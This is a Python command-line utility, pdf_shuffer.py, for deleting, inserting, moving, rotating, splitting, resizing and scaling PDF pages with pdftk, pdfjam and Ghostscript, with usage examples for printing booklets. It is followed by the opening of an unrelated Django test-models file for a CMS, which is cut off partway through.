3. Remove pages 2-3 and 11-12, and insert a blank page after page 1.
pdfjam --outfile ~/tmp/04.pdf 04.pdf "1,{},4-10,13-"
4. Split a file into three parts.
$ pdfjam --outfile ~/tmp/04_part1.pdf 04.pdf "1-10"
$ pdfjam --outfile ~/tmp/04_part2.pdf 04.pdf "11-30"
$ pdfjam --outfile ~/tmp/04_part3.pdf 04.pdf "31-"
5. Merge multiple files into one.
$ pdfjam --outfile ~/tmp/04.pdf ~/tmp/04_part1.pdf ~/tmp/04_part2.pdf ~/tmp/04_part3.pdf
6. Combine multiple pages onto each sheet.
$ pdfjam --nup 2x1 --landscape --outfile ~/tmp/04.pdf 04.pdf
7. Clip a page into two pages.
Assume 01exp.pdf contains only one physical page, which consists of two logical pages, and "Paper Size: A4, Landscape (11.69 x 8.27 inch)". (01exp.pdf can be generated from "pdfjam --landscape --outfile 01exp.pdf 01a4-book.pdf 1")
Need to clip it into two pages, each "Paper Size: A4, Portrait (8.27 x 11.69 inch)". A DIN A4 page (width×height) = 210x297 mm = 595×842 pps = 8.27x11.69 inch. 1 inch = 72 pps = 25.4 millimeter.
Get the left logical page:
$ pdfjam --trim "0 0 148.5mm 0" --outfile 01expL.pdf 01exp.pdf
Get the right logical page:
$ pdfjam --trim "148.5mm 0 0 0" --outfile 01expR.pdf 01exp.pdf
8. Scale the page content of PDF files while keeping the physical page size the same. (http://www2.warwick.ac.uk/fac/sci/statistics/staff/academic-research/firth/software/pdfjam/, http://ma.juii.net/blog/scale-page-content-of-pdf-files)
Scale at center and move the given offset relative to the left-bottom.
$ pdfjam --scale 1.06 --offset '2cm 2cm' --outfile tmp2/A1_06.pdf tmp2/A.pdf
9. Arrange pages into a booklet. Note to pass total page number, round up to a multiple of 4, to "--signature".
$ pdfbook --short-edge --signature 56 04.pdf
10.
$ pdfjam --landscape --offset "6mm 0" --outfile 1final.pdf ~/tmp/1nup.pdf (move content 6mm right-forward)
[Advanced PDFjam Examples]
1. Make a A5 booklet for "Disney's World Of English book 01.pdf".
This file contains 57 pages. The last page is meanless and I decide not to print it. The first page size is much larger the the others. So it's necessary to resize them separately.
1.1 Rename to a shorter name.
$ cp Disney\'s\ World\ Of\ English\ book\ 01.pdf 01.pdf
1.2 Resize the first page.
$ pdfjam --paper a4paper --outfile 01p1.pdf 01.pdf 1
1.3 Resize the other pages except 57.
$ pdfjam --paper a4paper --outfile 01p2.pdf 01.pdf 2-56
1.4 Merge all pages.
$ pdfjam --outfile 01a4.pdf 01p1.pdf 01p2.pdf
1.5 Make a booklet.
$ pdfbook --short-edge --signature 56 01a4.pdf
If left blank of each logical page is desired, use following command:
$ pdfbook --short-edge --signature 56 --delta "2cm 0" 01a4.pdf
The final output is 01a4-book.pdf. Each logical page size is A5. Print it double-side, then bind pages at the middle.
2. Print "truck town" twoside, each side contains 4 A6 pages.
truck.pdf contains 420 pages. There are 35 booklets, each booklet contains 12 pages. There are 4 meanless pages in each booklet: page 2, 3, 11 and 12. So there are 8*35 pages need to print. If they are printed 4 pages on each A4 sheet and twoside, it will only require 35 A4 papers.
2.1 Delete pages 2, 3, 11 and 12 in each booklet. The result pdf contains 280 pages.
$ pdf_shuffer.py -d 12*n+2,12*n+3,12*n+11,12*n+12 truck.pdf tmp
2.2 Combine 4 pages. The result pdf contains 70 physical pages. Paper size is scaled to A4 automatically.
$ pdfjam --nup 2x2 --delta "2mm 2mm" --frame true --outfile truck22.pdf tmp/truck.pdf
2.3 There's no space reserved for binding on each page of the result pdf of above step. Following command reserve 10 mm at each paper's left side. The scale ratio is: 1 - offset * 2 / 210 = 0.95238.
$ pdfjam --scale 0.95238 --offset "5mm 0" --twoside --outfile truck22o.pdf truck22.pdf
The final output is truck22o.pdf. Each logical page size is A6. Print it double-side, then bind pages at the left.
3. Make an A6 booklet for "truck town".
3.1 Resize all pages to A4.
$ pdfjam --paper a4paper --outfile trucka4.pdf truck.pdf
3.2 Make an A5 booklet.
$ pdfbook --short-edge --signature 12 trucka4.pdf
3.3 The total page number 210 (must be even) of trucka4.pdf is not a multiple of 4. To fix that, append two blank pages at the end.
$ pdfjam --landscape --outfile trucka4-book2.pdf trucka4-book.pdf "1-,{},{}"
3.4 Swap 4n+2 and 4n+3.
$ pdf_shuffer.py -m 4*n+3:4*n+2 trucka4-book2.pdf tmp
3.5 Combine every 2 pages into one.
$ pdfjam --nup 1x2 --frame true --outfile trucka4-book3.pdf tmp/trucka4-book2.pdf
The final output is trucka4-book3.pdf. Each logical page size is A6. Print it double-side, cut each A4 paper into two A5, bind every 6 A5 papers into an A6 booklet.
[TODO]
1. How to scale two dimensions separately? gs sometimes work, sometimes broken.
$ pdfjam --no-tidy --scale "1 1.2" trucka4.pdf
$ pdfjam --trim "0 30.375 0 30.375" --clip true --frame true trucka4.pdf
2. pdfjam cannot query the number of pages. pdfinfo can do that. Maybe it's better to replace pdftk with pdfjam & pdfinfo in this script?
'''
import subprocess
import tempfile
import os.path
import argparse
import re
import shutil
import locale
import logging
import sys
import readline
import traceback
tmpd_ = tempfile.TemporaryDirectory()
#tmpd = tmpd_.name
tmpd = '/tmp' #Keep temporary directory when debug
patt_add_exp = '^[\dn+\-*/]+:[\dn+\-*/]+(,[\dn+\-*/]+:[\dn+\-*/]+)*(@\d+(-\d+)?(,\d+(-\d+)?)*)?$'
patt_del_exp = '^[\dn+\-*/]+(,[\dn+\-*/]+)*(@\d+(-\d+)?(,\d+(-\d+)?)*)?$'
patt_mov_exp = patt_add_exp
patt_rotate_exp = patt_del_exp
patt_join_exp = patt_del_exp
patt_split_exp = patt_del_exp
patt_pg_size = 'Page\s+(?P<pn>\d+)\s+size:\s+(?P<width>[\d\.]+)\s+x\s+(?P<height>[\d\.]+)\s+.*'
patt_paper = '^a[1-6]paper$'
encoding = locale.getdefaultlocale()[1]
if(not encoding):
# None means the portable 'C' locale. However str.decode(encoding) doesn't accept None.
encoding = 'ASCII'
def getstatusoutput(cmdline, keepStdErr=True, raiseException=True):
logging.info(str(cmdline))
if(keepStdErr):
err = subprocess.STDOUT
else:
err = None
stdout = subprocess.PIPE
proc = subprocess.Popen(cmdline, stdout=stdout, stderr=err, shell=isinstance(cmdline, str))
out, _ = proc.communicate()
if(out):
out2 = out.decode(encoding, 'ignore')
else:
out2 = ''
logging.info(out2)
# A None value indicates that the process hasn't terminated yet.
assert(proc.returncode!=None)
if(proc.returncode!=0 and raiseException):
raise Exception('command failure: ' + str(cmdline))
return(proc.returncode, out2)
def reglob(path, exp, invert=False):
"""glob.glob() style searching which uses regex
:param exp: Regex expression for filename
:param invert: Invert match to non matching files
"""
m = re.compile(exp)
if invert is False:
res = [f for f in os.listdir(path) if m.match(f)]
else:
res = [f for f in os.listdir(path) if not m.match(f)]
res = list(map(lambda x: os.path.join(path, x), res))
return res
class RangeList(object):
def __init__(self, spec):
'''1,3-5,6'''
self.rl = list()
for subspec in spec.split(','):
tokens = subspec.split('-')
begin = int(tokens[0])
if(len(tokens)>=2):
end = int(tokens[1])
else:
end = begin
self.rl.append(range(begin, end+1))
def __iter__(self):
for r in self.rl:
for i in r:
yield i
def eval_del_exp(max_pn, del_exp):
if(re.match(patt_del_exp, del_exp) == None):
raise Exception('invalid del_exp: ' + del_exp)
ops = list()
tokens = del_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
del_exp = tokens[0]
exps = del_exp.split(',')
for exp_pn in exps:
if(exp_pn.find('n') == -1):
# constant page no
pn = int(exp_pn)
if((pn > 0) and (pn <= max_pn)):
ops.append(pn)
continue
for n in n_range:
try:
pn = int(eval(exp_pn))
except (NameError, SyntaxError):
print('invalid del_exp: '+ del_exp)
raise
if((pn >= 1) and (pn <= max_pn)):
ops.append(pn)
ops = sorted(set(ops))
return ops
def eval_add_exp(max_pn, add_exp):
if(re.match(patt_add_exp, add_exp) == None):
raise Exception('invalid add_exp: ' + add_exp)
ops = dict()
tokens = add_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
add_exp = tokens[0]
exps = add_exp.split(',')
for exp in exps:
add_spec = exp.split(':')
exp_pn = add_spec[0]
exp_blanks = add_spec[1]
if(exp.find('n') == -1):
# constant page no
pn = int(exp_pn)
blanks = int(exp_blanks)
if((pn >= 1) and (pn <= max_pn + 1) and (blanks >= 1) and (pn not in ops)):
ops[pn] = blanks
continue
for n in n_range:
try:
pn = int(eval(exp_pn))
blanks = int(eval(exp_blanks))
except (NameError, SyntaxError):
print('invalid add_exp: '+ add_exp)
raise
if((pn >= 1) and (pn <= max_pn + 1) and (blanks >= 1) and (pn not in ops)):
ops[pn] = blanks
return sorted(ops.items())
def eval_mov_exp(max_pn, mov_exp):
assert(mov_exp!=None)
if(re.match(patt_mov_exp, mov_exp) == None):
raise Exception('invalid mov_exp: ' + mov_exp)
ops = list()
tokens = mov_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
mov_exp = tokens[0]
exps = mov_exp.split(',')
for exp in exps:
mov_spec = exp.split(':')
exp_pn1 = mov_spec[0]
exp_pn2 = mov_spec[1]
if(exp.find('n') == -1):
# constant page no
pn1 = int(exp_pn1)
pn2 = int(exp_pn2)
if((pn1 >= 1) and (pn1 <= max_pn) and (pn2 >= 1) and (pn2 <= max_pn + 1)):
ops.append((pn1, pn2))
continue
for n in n_range:
try:
pn1 = int(eval(exp_pn1))
pn2 = int(eval(exp_pn2))
except (NameError, SyntaxError):
print('invalid mov_exp: '+ mov_exp)
raise
if((pn1 >= 1) and (pn1 <= max_pn) and (pn2 >= 1) and (pn2 <= max_pn + 1)):
ops.append((pn1, pn2))
return ops
'''ints is in type of list or set'''
def ints2str(ints):
ints = list(ints)
ints.sort()
l = (str(item) for item in ints)
res = ' '.join(l)
return res
def pg_path_patt():
return os.path.join(tmpd, 'pg_%d.pdf')
def pg_paths():
return reglob(tmpd, '^pg_\d+.pdf$')
def pg_path(pg_no):
return os.path.join(tmpd, 'pg_%d.pdf'%pg_no)
def pg_num(pg_fp):
return int(os.path.splitext(os.path.basename(pg_fp))[0][3:])
def blank_fp(prototype_fp):
fp = os.path.join(tmpd, 'blank1.pdf')
if(os.path.isfile(fp)):
return fp
assert(os.path.isfile(prototype_fp))
getstatusoutput(['pdfjam', '--outfile', fp, prototype_fp, '{},1'])
getstatusoutput(['pdfjam', '--outfile', fp, fp, '1'])
assert(os.path.isfile(fp))
return fp
def pglist2str(pglist):
l = (os.path.basename(item) for item in pglist)
return ' '.join(l)
'''
There are several ways to get number of pages:
zhichyu@jupiter:~$ pdftk 01.pdf dump_data
InfoKey: Creator
InfoValue: ACDSee
InfoKey: Title
InfoValue: ACDSee PDF Image.
InfoKey: CreationDate
InfoValue: D:20070303102909
NumberOfPages: 57
zhichyu@jupiter:~$ pdftk 01.pdf burst
zhichyu@jupiter:~$ cat doc_data.txt
InfoKey: Creator
InfoValue: ACDSee
InfoKey: Title
InfoValue: ACDSee PDF Image.
InfoKey: CreationDate
InfoValue: D:20070303102909
NumberOfPages: 57
zhichyu@jupiter:~/tmp$ pdfinfo -f 1 -l 100000 /home/zhichyu/tmp/1.pdf
Creator: TeX
Producer: iText® 5.2.0 ©2000-2012 1T3XT BVBA
CreationDate: Mon Jan 20 16:17:38 2014
ModDate: Mon Jan 20 16:22:03 2014
Tagged: no
Form: none
Pages: 34
Encrypted: no
Page 1 size: 522.24 x 773.81 pts
Page 1 rot: 0
Page 2 size: 520.24 x 769.81 pts
Page 2 rot: 0
Page 3 size: 522.24 x 773.81 pts
Page 3 rot: 0
Page 4 size: 520.24 x 769.81 pts
Page 4 rot: 0
Page 5 size: 522.24 x 773.81 pts
Page 5 rot: 0
Page 6 size: 520.24 x 769.81 pts
Page 6 rot: 0
Page 7 size: 522.24 x 773.81 pts
Page 7 rot: 0
Page 8 size: 520.24 x 769.81 pts
Page 8 rot: 0
Page 9 size: 522.24 x 773.81 pts
Page 9 rot: 0
Page 10 size: 520.24 x 769.81 pts
Page 10 rot: 0
Page 11 size: 522.24 x 773.81 pts
Page 11 rot: 0
Page 12 size: 520.24 x 769.81 pts
Page 12 rot: 0
Page 13 size: 522.24 x 773.81 pts
Page 13 rot: 0
Page 14 size: 520.24 x 769.81 pts
Page 14 rot: 0
Page 15 size: 522.24 x 773.81 pts
Page 15 rot: 0
Page 16 size: 520.24 x 769.81 pts
Page 16 rot: 0
Page 17 size: 522.24 x 773.81 pts
Page 17 rot: 0
Page 18 size: 520.24 x 769.81 pts
Page 18 rot: 0
Page 19 size: 522.24 x 773.81 pts
Page 19 rot: 0
Page 20 size: 520.24 x 769.81 pts
Page 20 rot: 0
Page 21 size: 522.24 x 773.81 pts
Page 21 rot: 0
Page 22 size: 520.24 x 769.81 pts
Page 22 rot: 0
Page 23 size: 522.24 x 773.81 pts
Page 23 rot: 0
Page 24 size: 520.24 x 769.81 pts
Page 24 rot: 0
Page 25 size: 522.24 x 773.81 pts
Page 25 rot: 0
Page 26 size: 520.24 x 769.81 pts
Page 26 rot: 0
Page 27 size: 522.24 x 773.81 pts
Page 27 rot: 0
Page 28 size: 520.24 x 769.81 pts
Page 28 rot: 0
Page 29 size: 522.24 x 773.81 pts
Page 29 rot: 0
Page 30 size: 520.24 x 769.81 pts
Page 30 rot: 0
Page 31 size: 522.24 x 773.81 pts
Page 31 rot: 0
Page 32 size: 520.24 x 769.81 pts
Page 32 rot: 0
Page 33 size: 522.24 x 773.81 pts
Page 33 rot: 0
Page 34 size: 520.24 x 769.81 pts
Page 34 rot: 0
File size: 3808037 bytes
Optimized: no
PDF version: 1.4
'''
def get_num_pages(fp):
rc, output = getstatusoutput(['pdftk', fp, 'dump_data'])
name = 'NumberOfPages:'
val = 0
for line in output.splitlines():
if(line.startswith(name)):
val = line[len(name):].strip()
val = int(val)
break
return val
def get_pages_size(fp):
rc, output = getstatusoutput(['pdfinfo', '-f', '1', '-l', '100000', fp])
i = 0
sizes = list()
patt = re.compile(patt_pg_size)
for line in output.splitlines():
m = patt.match(line)
if(m==None):
continue
pn = int(m.group('pn'))
width = float(m.group('width'))
height = float(m.group('height'))
assert(pn == i+1)
sizes.append((width, height))
i += 1
return sizes
def is_same_size(pg_sizes):
assert(len(pg_sizes)>=1)
same_size = True
for i in range(1, len(pg_sizes)):
(width1, height1) = pg_sizes[i-1]
(width2, height2) = pg_sizes[i]
if(width1!=width2 or height1!=height2):
same_size = False
return same_size
def get_pages_orientation(pg_sizes):
# All pages could be in the different orientation.
orientation = list()
assert(len(pg_sizes)>=1)
num_portrait = 0
num_landscape = 0
for i in range(0, len(pg_sizes)):
(width, height) = pg_sizes[i]
if(width >= height):
num_landscape += 1
else:
num_portrait += 1
if(num_portrait >= num_landscape):
return True
else:
return False
def rotate_inplace(fp):
#pdfjam --angle 90 --landscape --outfile ~/tmp/04.pdf 04.pdf
sizes = get_pages_size(fp)
is_portrait = get_pages_orientation(sizes)
tmp_fp = os.path.join(tmpd, os.path.basename(fp)+'.rotated')
if(is_portrait):
getstatusoutput(['pdfjam', '--landscape', '--angle', '90', '--outfile', tmp_fp, fp])
else:
getstatusoutput(['pdfjam', '--angle', '90', '--outfile', tmp_fp, fp])
shutil.copyfile(tmp_fp, fp)
def split(fp):
getstatusoutput(['pdftk', fp, 'burst', 'output', pg_path_patt()])
pages = sorted(pg_paths(), key=pg_num)
return pages
def merge(pages, dst_fp):
getstatusoutput(['pdftk'] + pages + ['cat', 'output', dst_fp])
def erase_pg(pglist2, new_pn):
assert(new_pn<=len(pglist2))
del pglist2[new_pn - 1]
for i in range(new_pn-1, len(pglist2)):
pg = pglist2[i]
pg[1] -= 1
def insert_pg(pglist2, new_pn, pg):
pg[1] = new_pn
pglist2.insert(new_pn-1, pg)
for i in range(new_pn, len(pglist2)):
pg = pglist2[i]
pg[1] += 1
'''Add blank pages per an expression.'''
def op_add(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
add_spec = eval_add_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + str(add_spec))
if(len(add_spec) == 0):
shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
pglist = list() # pglist1 item structure: pg_path
for i in range(0, max_pn):
pglist.append(pg_path(i+1))
blank1 = blank_fp(pages[0])
for item in reversed(add_spec):
orig_pn = item[0]
blank_pg_num = item[1]
if(orig_pn > max_pn):
for i in range(0, blank_pg_num):
pglist.append(blank1)
else:
for i in range(0, blank_pg_num):
pglist.insert(orig_pn-1, blank1)
merge(pglist, outfile)
'''Delete pages whose number match an expression.'''
def op_delete(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
del_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(del_spec))
if(len(del_spec) == 0):
shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
pglist = list() # pglist item structure: [remained, pg_path]
for i in range(0, max_pn):
pglist.append([True, pg_path(i+1)])
for i in del_spec:
pglist[i-1][0] = False
# generator expression is more powerful than built-in filter().
pglist = list(item[1] for item in pglist if item[0]==True)
merge(pglist, outfile)
'''Move pages per an expression.'''
def op_move(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
mov_spec = eval_mov_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + str(mov_spec))
if(len(mov_spec) == 0):
shutil.copyfile(infile, outfile)
else:
getstatusoutput(['pdftk', infile, 'burst', 'output', pg_path_patt()])
pages = sorted(pg_paths(), key=pg_num)
assert(max_pn == len(pages))
pglist1 = list() # pglist1 item structure: [orig_pn, new_pn, pg_path]. pglist1 is indexed by orig_pn-1.
pglist2 = list() # pglist2 is a shallow copy of pglist1, and is indexed by new_pn-1.
for i in range(0, max_pn):
item = [i+1, i+1, pg_path(i+1)]
pglist1.append(item)
pglist2 = pglist1.copy()
for (orig_pn1, orig_pn2) in mov_spec:
pg1 = pglist1[orig_pn1 - 1]
new_pn1 = pg1[1]
erase_pg(pglist2, new_pn1)
if(orig_pn2 > max_pn):
# move pages to the end
assert(orig_pn2 == max_pn + 1)
insert_pg(pglist2, max_pn+1, pg1)
else:
# normal movement
pg2 = pglist1[orig_pn2 - 1]
new_pn2 = pg2[1]
insert_pg(pglist2, new_pn2, pg1)
# generator expression is more powerful than built-in filter().
pglist = list(item[2] for item in pglist2)
merge(pglist, outfile)
'''Rotate pages whose number match an expression.'''
def op_rotate(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
rotate_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(rotate_spec))
if(not rotate_spec):
return
if(len(rotate_spec) == 0):
shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
for i in range(0, max_pn):
if i+1 in rotate_spec:
rotate_inplace(pages[i])
merge(pages, outfile)
def op_join(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
join_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(join_spec))
if(len(join_spec) == 0):
if(outfile != infile):
shutil.copyfile(infile, outfile)
else:
sizes = get_pages_size(infile)
pages = split(infile)
assert(max_pn == len(pages))
pglist = list()
i = 0
while(i < max_pn):
if(i+1 in join_spec and i+1 < max_pn):
# FIXME: pdfjam requires all PDF files' name use '.pdf' suffix.
tmp_page1 = pages[i] + '.tmp1.pdf'
tmp_page2 = pages[i] + '.tmp2.pdf'
merge([pages[i], pages[i+1]], tmp_page1)
is_portrait = get_pages_orientation(sizes[i:i+2])
if(is_portrait):
cmd = ['pdfjam', '--landscape', '--nup', '2x1', '--outfile', tmp_page2, tmp_page1]
else:
cmd = ['pdfjam', '--nup', '1x2', '--outfile', tmp_page2, tmp_page1]
getstatusoutput(cmd)
pglist.append(tmp_page2)
i += 2
else:
pglist.append(pages[i])
i += 1
merge(pglist, outfile)
def op_split(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
split_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(split_spec))
if(len(split_spec) == 0):
if(outfile != infile):
shutil.copyfile(infile, outfile)
else:
sizes = get_pages_size(infile)
pages = split(infile)
assert(max_pn == len(pages))
pglist = list()
i = 0
while(i < max_pn):
if(i+1 in split_spec):
width, height = sizes[i]
if(width>=height):
is_portrait = False
size1 = '0 0 %fpts 0' % (width/2) # left, top, right, bottom
size2 = '%fpts 0 0 0' % (width/2)
else:
is_portrait = True
size1 = '0 0 0 %fpts' % (height/2)
size2 = '0 %fpts 0 0' % (height/2)
tmp_page1 = pages[i] + '.tmp1.pdf'
tmp_page2 = pages[i] + '.tmp2.pdf'
getstatusoutput(['pdfjam', '--trim', size1, '--outfile', tmp_page1, pages[i]])
getstatusoutput(['pdfjam', '--trim', size2, '--outfile', tmp_page2, pages[i]])
pglist.append(tmp_page1)
pglist.append(tmp_page2)
else:
pglist.append(pages[i])
i += 1
merge(pglist, outfile)
'''Resize all pages one by one.'''
def op_resize(infile, outfile, expression):
assert(expression!=None)
# WARNNING: pdfjam requires the "paper" suffix in the name. Otherwise treat both "a4" and "a5" as us letter.
if(re.match(patt_paper, expression) == None):
raise Exception('unsupported paper size %s.' %expression)
sizes = get_pages_size(infile)
same_size = is_same_size(sizes)
is_portrait = get_pages_orientation(sizes)
max_pn = len(sizes)
logging.info('max_pn: ' + str(max_pn))
if(same_size):
cmd = ['pdfjam', '--paper', expression, '--outfile', outfile, infile]
if(not is_portrait):
cmd.append('--landscape')
getstatusoutput(cmd)
return
for i in range(0, max_pn):
cmd = ['pdfjam', '--paper', expression, '--outfile', pg_path(i+1), infile, str(i+1)]
if(not is_portrait):
cmd.append('--landscape')
getstatusoutput(cmd)
cmd = ['pdfjam', '--noautoscale', 'true', '--outfile', outfile]
if(not is_portrait):
cmd.append('--landscape')
for i in range(0, max_pn):
cmd.append(pg_path(i+1))
getstatusoutput(cmd)
'''Scale the page content to fullfile page.'''
def op_scale(infile, outfile, expression):
assert(expression!=None)
logging.info('scale_exp: ' + expression)
tokens = expression.split(',')
ratioX, ratioY = float(tokens[0]), float(tokens[1])
# Why "-dFIXEDMEDIA -sPAPERSIZE=a4" doesn't work? http://stackoverflow.com/questions/7446552/resizing-a-pdf-using-ghostscript
#gs -dNOPAUSE -dBATCH -dSAFER -dCompatibilityLevel="1.3" -dPDFSETTINGS="/printer" -dSubsetFonts=true -dEmbedAllFonts=true -sDEVICE=pdfwrite -sOutputFile="out.pdf" -c "<</BeginPage{0.9 0.9 scale 29.75 42.1 translate}>> setpagedevice" -f /home/zhichyu/tmp/A.pdf
sizes = get_pages_size(infile)
same_size = is_same_size(sizes)
if(not same_size):
raise('The scale operation requires all pages be in the same size!')
cmd = 'gs -dNOPAUSE -dBATCH -dSAFER -dCompatibilityLevel="1.3" -dPDFSETTINGS="/printer" -dSubsetFonts=true -dEmbedAllFonts=true -sDEVICE=pdfwrite -sOutputFile="%s"' % outfile
(width, height) = sizes[0]
# gs scales and moves per the left-bottom. pdfjam scales per the center, and moves per the left-bottom.
offsetX = (1 - ratioX) * 0.5 * width
offsetY = (1 - ratioY) * 0.5 * height
cmd += ' -c "<</BeginPage{%f %f scale %f %f translate}>> setpagedevice" -f "%s"'%(ratioX, ratioY, offsetX, offsetY, infile)
getstatusoutput(cmd)
def operate(infile, outfile, op, exp):
# clean up temp directory
pages = sorted(pg_paths(), key=pg_num)
for pg_fp in pages:
os.unlink(pg_fp)
if(op=='add'):
op_add(infile, outfile, exp)
elif(op=='delete'):
op_delete(infile, outfile, exp)
elif(op=='move'):
op_move(infile, outfile, exp)
elif(op=='rotate'):
op_rotate(infile, outfile, exp)
elif(op=='join'):
op_join(infile, outfile, exp)
elif(op=='split'):
op_split(infile, outfile, exp)
elif(op=='resize'):
op_resize(infile, outfile, exp)
elif(op=='scale'):
op_scale(infile, outfile, exp)
else:
assert(0)
def main():
usage = '''Edit a pdf file for better printing.
shuffe operations:
add: add blank pages per expression "sub_exp[,sub_exp]*[@n_range]". sub_exp format is "f(n):g(n)". Both f(n) and g(n) are Python expressions of variable n, such as "12*n". Earlier sub_exp precedes over later ones, so they are not swapable. If n_range is not specified, it's default to "0-N" when N is the number of panges plus one. The format of n_range is "sub_range[,sub_range]*". Each sub_range is an integer or an interger pair splited with "-". Example 1: "5:1" means inserting a blank page just before page 5. Example 2: "5*n+1:2" means insert 2 blank pages just before page 1.6.11.16... Example 3: "5*n+1:2@0,2" is equavalent to "1:2,11,2".
delete: delete pages per expression "sub_exp[,sub_exp]*[@n_range]". The expression is a Python expression on variable n, such as "12*n". Example 1: "1,12*n+11,12*n+12" means deleting pages in the set {1, 12n+11, 12n+12 | integer n>=0}. The n_range usage is the same to the add operation.
move: move pages per expression. The expression format is the same to add with following semantic: earlier sub_exp precedes over later ones. Example 1: "5:1" means moving page 5 to just before page 1. Example 2: "5*n+5:5*n+1,5*n+4:5*n+1" means reorder all pages per 5n+5.5n+4.5n+1.5n+2.5n+3. Example 3: "5*n+4:5*n+1,5*n+5:5*n+1" means reorder all pages per 5n+4.5n+5.5n+1.5n+2.5n+3.
in-page edit operations:
rotate: rotate left (counter-clockwise) pages per an expression. The expression format is the same to delete.
join: join a page with the next one per an expression. The expression is the same to delete.
split: split a page into two parts per an expression. The expression is the same to delete.
page & content size operations:
resize: resize all pages one by one. pdfjam and printers resize all pages per the first page. This cause a disaster if pages are in different sizes. Supported sizes are: aNpaper, where N is an integer in [1,6]
scale: scale all pages' content, a.k.a change the margins of PDF file while keeping the physical page size the same. expression is: ratioX,ratioY.
'''
parser = argparse.ArgumentParser(description=usage, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-o', '--outfile', metavar='outfile', default=None, help='destination file or directory, edit inplace if not specified')
parser.add_argument('infile', metavar='infile', help='source PDF file')
subparsers = parser.add_subparsers(dest='op', help='sub-command help')
supported_ops = ['add', 'delete', 'move', 'rotate', 'join', 'split', 'resize', 'scale']
for op in supported_ops:
subparser = subparsers.add_parser(op, help='help info of %s'%op)
subparser.add_argument('exp')
args = parser.parse_args()
infile = os.path.abspath(args.infile)
if(not os.path.isfile(infile)):
print('infile is not a file: %s' % infile)
return
if(args.outfile):
outfile = os.path.abspath(args.outfile)
if(os.path.isdir(outfile)):
outfile = os.path.join(outfile, os.path.basename(infile))
else:
outfile = infile
if(args.op):
if(args.op not in supported_ops):
parser.error('operation not supported!')
if(not args.exp):
parser.error('expression is missing!')
logFile = '/tmp/pdf_shuffer.log'
# set up logging to file. Several traps here:
# 1. If any loging.info(...) is invoked before logging.basicConfig(logFile), the logFile will not be created!
# 2. If multiple scripts invokes logging.basicConfig(logFile), the logFile will be truncated!
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s', filename=logFile, filemode='w')
if(args.op):
try:
operate(infile, outfile, args.op, args.exp)
except Exception as e:
print(traceback.format_exc())
print('Error: the above operation failed. The output file could be corrupt!')
else:
#interactive mode. Refers to http://pymotw.com/2/readline/.
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode emacs')
special_ops = ['help', 'quit', 'exit']
all_ops = supported_ops + special_ops
print('type "help" for help, "quit" or "exit" to quit')
prompt = '[op exp] '
while(True):
line = input(prompt)
line = line.strip()
tokens = line.split()
if(not tokens or (not tokens[0] in all_ops) or tokens[0]=='help'):
print(usage)
elif(tokens[0] in ['quit', 'exit']):
break
elif(len(tokens) != 2):
print(usage)
else:
try:
operate(infile, outfile, tokens[0], tokens[1])
# Only the first op is allowed to customize outfile. Later operations edit the file in place.
infile = outfile
except Exception as e:
print(traceback.format_exc())
print('Error: the above operation failed. The output file could be corrupt!')
break
def test_expressions():
max_pn = 420
del_exp = "1,12*n+11,12*n+12@0-3"
add_exp = "12*n+1:2,12*n+2:1@0,10"
mov_exp = "12*n+7:12*n+1,12*n+8:12*n+1"
print('max_pn: ' + str(max_pn))
print('del_exp: ' + del_exp)
print('add_exp: ' + add_exp)
print('mov_exp: ' + mov_exp)
print('del_exp is evaluated to: ')
print(eval_del_exp(max_pn, del_exp))
print('add_exp is evaluated to: ')
print(eval_add_exp(max_pn, add_exp))
print('mov_exp is evaluated to: ')
print(eval_mov_exp(max_pn, mov_exp))
import sys
sys.exit()
if __name__ == '__main__':
#test_expressions()
main()
|
yuzhichang/pdf_shuffer
|
pdf_shuffer.py
|
Python
|
gpl-3.0
| 34,766 | 0.006041 |
from wheelcms_axle.content import Content, FileContent, ImageContent
from wheelcms_axle.spoke import Spoke, action, FileSpoke
from wheelcms_axle.content import type_registry
from django.db import models
class Type1(Content):
t1field = models.TextField(null=True, blank=True)
class Type1Type(Spoke):
model = Type1
discussable = True
@action
def hello(self, handler, request, action):
return ("Hello", request, handler, self, action)
class Type2(Content):
pass
class Type2Type(Spoke):
model = Type2
discussable = False
class TestFile(FileContent):
storage = models.FileField(upload_to="files", blank=False)
class TestFileType(FileSpoke):
model = TestFile
children = ()
class OtherTestFile(FileContent):
storage = models.FileField(upload_to="files", blank=False)
class OtherTestFileType(FileSpoke):
model = OtherTestFile
children = ()
class TestImage(ImageContent):
storage = models.ImageField(upload_to="images", blank=False)
class TestImageType(FileSpoke):
model = TestImage
children = ()
class OtherTestImage(ImageContent):
storage = models.ImageField(upload_to="images", blank=False)
class OtherTestImageType(FileSpoke):
model = OtherTestImage
children = ()
class TypeM2M(Content):
m2m = models.ManyToManyField("self")
class TypeM2MType(Spoke):
model = TypeM2M
class TypeUnique(Content):
uniek = models.TextField(unique=True)
class TypeUniqueType(Spoke):
